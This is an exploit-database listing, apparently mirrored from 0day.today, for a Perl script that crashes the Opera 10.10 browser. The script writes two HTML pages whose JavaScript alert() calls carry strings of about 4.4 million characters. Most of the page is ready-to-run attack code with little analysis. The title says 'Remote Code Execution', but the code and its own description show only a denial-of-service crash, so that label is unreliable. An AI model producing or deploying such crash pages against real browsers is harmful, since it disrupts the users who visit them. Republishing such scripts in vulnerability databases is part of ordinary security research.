Lucene search
K

Opera 10.10 Remote Code Execution DoS Exploit

🗓️ 05 Feb 2010 00:00:00Reported by cr4wl3rType 
zdt
 zdt
🔗 0day.today👁 22 Views

Opera 10.10 Remote Code Execution Do

Code
=============================================
Opera 10.10 Remote Code Execution DoS Exploit
=============================================

#!/usr/bin/perl
 
 
# Title : Opera 10.10 Remote Code Execution DoS Exploit
# Tested : Windows xp (sp2)
 
# Description : Opera Web Browser is vulnerable DoS within its javascript tags (alert)
# This issue can be exploited by using a large value in a alert tags to create an out-of-bounds memory access
 
 
print qq(
###################################################
## Opera 10.10 Remote Code Execution DoS Exploit ##
## Credits : Dj7xpl                              ##
###################################################
);
 
my $header = "<html>\n<script>\n";
my $footer = "</script>\n</html>";
 
 
my $uhoh1 = "var buf = 'A';\n".
           "while (buf.length <= 4444444) buf+=buf;\n".
           "alert(buf)\n";
 
##################################################################
open(myfile,'>> uhoh1.html');
print myfile $header.$uhoh1.$footer;
##################################################################
 
 
my $uhoh2 = "alert(\'". "A" x 4444444 ."'\)"."\n";
 
##################################################################
open(myfile,'>> uhoh2.html');
print myfile $header.$uhoh2.$footer;
##################################################################
 
print "\nDone, successfully created!\n";



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2010 00:00Current
7High risk
Vulners AI Score7
22